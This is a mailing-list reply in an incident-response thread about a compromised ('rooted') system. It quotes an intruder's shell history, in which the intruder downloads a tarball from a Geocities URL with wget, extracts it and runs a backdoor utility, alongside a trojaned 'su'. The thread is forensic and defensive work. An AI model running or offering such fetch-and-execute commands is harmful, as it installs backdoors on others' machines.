Re: Rooted, .haos on system
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
Maybe you should email this dude. He wrote the exploit (or so the exploit says):
"su exploit by XP <xp@xxxxxxxxxxxxxxxx>
Enjoy!
"
Other neat stuff if you do a strings on the two filenames.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>
The domain name resolves to http://www.djteckh.com/; maybe worth checking out.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com